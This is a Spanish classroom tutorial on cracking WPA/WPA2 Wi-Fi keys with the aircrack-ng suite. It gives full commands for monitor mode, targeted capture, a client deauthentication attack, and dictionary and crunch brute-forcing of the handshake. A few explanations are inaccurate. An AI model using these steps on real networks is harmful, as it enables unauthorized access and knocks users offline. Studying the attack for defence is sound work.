PRÁCTICA - Crackear la contraseña del Wifi con WPA/WPA2
Crackear una contraseña nunca es una actividad lícita, es un robo de datos y está penado. Esto solo debe servir como último recurso cuando un usuario pierde su contraseña y no puede recuperarla.
Buscar más info en: https://byte-mind.net/cracking-de-wpa-wpa2-con-aircrack-ng/
Para realizar esta práctica necesitarás un dispositivo habilitado para la red inalámbrica, como un ordenador, portátil, Tablet, teléfono, etc. También deberás estar dentro del radio de transmisión de un punto de acceso de red inalámbrica. También requerirás de una interfaz o adaptador inalámbrico que permita la monitorización inalámbrica (modo promiscuo); la mayoría de los dispositivos (si la opción de red inalámbrica está activada) le proporcionarán una lista de redes disponibles.
Autenticación de red inalámbrica
Dado que la red es fácilmente accesible para todos los que tienen un dispositivo habilitado para la red inalámbrica, la mayoría de las redes están protegidas por contraseña. Algunas de las técnicas de autenticación más utilizadas son estas:
Desciframiento de claves WEP/WPA de red inalámbrica
Es posible descifrar las claves WEP/WPA/WPA2 utilizadas para obtener acceso a una red inalámbrica. Hacerlo requiere recursos de software y hardware. En la práctica que realizaremos, el éxito del ataque de piratería también puede depender de cuán activos e inactivos sean los usuarios de la red objetivo.
Existen algunas herramientas populares que pueden ayudarte a realizar este pirateo que son:
Aircrack – (La que usaremos más adelante) rastreador de red y cracker WEP. Esta herramienta de hacker de contraseñas WiFi se puede descargar desde http://www.aircrack-ng.org/
WEPCrack: este es un programa de hackers Wi-Fi de código abierto para romper las claves secretas WEP 802.11. Esta aplicación de hackers WiFi para PC es una implementación del ataque FMS. http://wepcrack.sourceforge.net/
Kismet: este hacker de contraseñas WiFi en línea detecta redes inalámbricas tanto visibles como ocultas, rastrea paquetes y detecta intrusiones. https://www.kismetwireless.net/
WebDecrypt: esta herramienta de pirateo de contraseñas WiFi utiliza ataques de diccionario activos para descifrar las claves WEP. Tiene su propio generador de claves e implementa filtros de paquetes para hackear la contraseña de WiFi. http://wepdecrypt.sourceforge.net/
CowPatty: esta herramienta de descifrado de contraseñas WiFi se utiliza para descifrar claves precompartidas (PSK) mediante un ataque de fuerza bruta. http://wirelessdefence.org/Contents/coWPAttyMain.htm
Cain & Abel: esta herramienta de hacker WiFi para PC se puede usar para decodificar archivos de captura de otros programas de rastreo como Wireshark. Los archivos de captura pueden contener tramas codificadas WEP o WPA-PSK. https://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml
Cómo proteger las redes inalámbricas
Ahora bien, esta práctica tiene que servirnos para darnos cuenta de la facilidad de crackeo de las redes así que, para minimizar los ataques a redes inalámbricas, una organización puede adoptar las siguientes directivas:
Cambio de contraseñas predeterminadas que vienen con el hardware.
Habilitación de mecanismos de autenticación.
El acceso a la red puede restringirse permitiendo solo direcciones MAC registradas (mediante ACL).
El uso de claves WEP y WPA-PSK fuertes, una combinación de símbolos, números y caracteres reduce la posibilidad de que las claves se descifren utilizando ataques de diccionario y fuerza bruta.
El software de firewall también puede ayudar a reducir el acceso no autorizado.

Crackear la contraseña
Vamos a proceder con la práctica de crackeo, el objetivo es capturar el protocolo de enlace de autenticación, ya sea WPA o WPA2, y posteriormente utilizar aircrack-ng para descifrar la clave previamente compartida. Esto podría realizarse de dos formas:
activa -> se acelerará el proceso al desautenticar a un cliente inalámbrico existente.
pasiva -> simplemente se esperará a que un cliente se autentifique en la red.
Los pasos para realizarla serán:
Iniciar la interfaz inalámbrica en modo monitor
Iniciar airodump-ng en el canal AP filtrando el bssid objectivo
Utilizar aireplay-ng para desautenticar al cliente
Utilizar aircrack-ng para descifrar la clave precompartida por el handshake
En mi caso he utilizado el sistema operativo Ubuntu Desktop 22.04.4 y la red víctima es la de alumnos de la academia cuya password es público para estos.
Interfaz inalámbrica en modo monitor
1.- Darnos permisos de usuario
sudo -s
2.- Instalamos el paquete de aircrack-ng
sudo apt-get install aircrack-ng
3.- Lo siguiente, antes de configurar la interfaz será matar todos los procesos que estén interfiriendo con nuestro dispositivo wifi, para ello escribimos este comando:
sudo airmon-ng check kill
Si el comando anterior da algún resultado lo ejecutamos de nuevo quedando así y no dándonos ningún resultado:

Para ello lo primero que debemos hacer es sacar el nombre de la interfaz asociada:
iwconfig
Que nos mostrará algo así:

En este caso la interfaz de tarjeta inalámbrica se corresponde con la wlp2s0
que sera el nombre que utilizaremos a partir de ahora. Podemos verificarlo mejor con el comando:
sudo airmon-ng
Antes de ponerla en modo monitor, debemos reiniciarla desde el propio airmon
, para detener nuestra interfaz wlp2s0
:
airmon-ng stop wlp2s0
Y volvemos a activar nuestra interfaz wlp2s0
:
airmon-ng start wlp2s0
Al terminar, escribimos iwconfig
otra vez y observamos que nuestra interfaz ha cambiado a wlp2s0mon
y debería aparecer el modo monitor activo:

Escaneo de la red víctima
1.- Obtenemos los datos de la red victima
Ahora sí, deberíamos empezar a capturar la red víctima. Para ello el primer paso es generar una captura de datos de la interfaz:
airodump-ng wlp2s0mon
Cuyo resultado será:

Como puedes ver en la captura, aparecen múltiples redes wifi, cada una con su BSSID y ESSID asociados incluso en diferentes canales. Quedémonos con los datos de la red que nos interesan:
Cuando terminemos, simplemente pulsamos CTRL+C para terminar el proceso.
2.- Nos mantenemos a la escucha de que un cliente se desconecte
Con el comando airodump-ng
estamos en escucha de que un cliente se desconecte y se conecte a su modem
airodump-ng -c 6 -w /home/alumno/Descargas/netdump --bssid E8:ED:D6:96:DF:F0 wlp2s0mon
Donde:
-c
-> indicamos el canal utilizado-–bssid
-> indicamos el bssid de nuestro punto de acceso-w
-> indicamos el nombre del fichero en el cual guardar los datos de la capturawlp2s0mon
-> por último indicamos el nombre de la interfaz utilizada
Si todo ha funcionado, con esto se nos habrán creado una serie de archivos de datos, el que nos interesa es el netdump.cap
:

Como vemos en la siguiente captura, el método de autenticación utilizado es PSK que utilizaremos para llevar a cabo nuestro ataque:

Desautenticar al cliente con aireplay-ng
El siguiente paso, en nuestro ataque activo, será ejecutar aireplay para desautenticar al cliente y forzarle a realizar de nuevo la conexión. Este paso es opcional, si tiene paciencia, puede esperar hasta que airodump capture una autenticación de uno o más clientes al punto de acceso. Al realizarlo de esta forma se acelera de forma efectiva el proceso. Si se da el caso en el que no hay ningún cliente conectado se deberá esperar a que al menos uno se conecte, ya que sino no será efectivo el ataque.
Este paso envía un mensaje al cliente indicando que ya no está conectado, lo que forzará que se autentifique de nuevo con el AP. La reautenticación es lo que generará el protocolo de enlace de autenticación de 4 vías que necesitamos recopilar para romper la clave precompartida WPA/WPA2.
No cierres la ventana del airodump, abre nueva pestaña en consola y ahora ejecutaremos entonces aireplay-ng:
aireplay-ng -0 1 -a E8:ED:D6:96:DF:F0 -c 3C:A0:67:3D:ED:5D wlp2s0mon
Donde:
-0
-> significa la desautenticación1
-> es el número de deauths enviados para desautenticar, pero puede enviar tantos como desee-a
-> se indica la dirección mac del punto de acceso (bssid)-c
-> se indica la dirección mac del cliente (station)wlp2s0mon
-> es el nombre de nuestra interfaz
Con suerte, se conseguirá que el cliente se reautentifique, forzando el protocolo de 4 vías. Puedes ver el fabricante del adaptador con la própia MAC, buscandolo con este enlace.

Cabe destacar que los paquetes de autenticación se envían directamente desde su PC a los clientes, por lo que deberá estar físicamente lo suficientemente cerca de los clientes y del punto de acceso.
Desencriptando la contraseñas a partir de los datos obtenidos
Con aircrack-ng
desencriptamos las contraseñas obtenidas:
aircrack-ng -w rockyou.txt -b *.cap
Donde:
netdump-01.cap
-> Es el archivo que se genero con airodump-ng.
Si funciona, aircrack empezará a descifrar las contraseñas comparandolas con las contraseñas del diccionario:

Como alternativa podemos generar nuestro propio diccionario
Si no funciono con aircrack-ng intentamos con crunch:
crunch 10 10 -t %%%%%%%%%% 1234567890 | aircrack-ng -w - /root/eddy-01.cap -e infinitump398
Donde:
%%%%%%%%%% 1234567890 Es el tipo de encriptado (solo números del 1 al 10) eddy-01.cap Es el archivo que se genero con airodump-ng infinitump398 Nombre de la red victima
Última actualización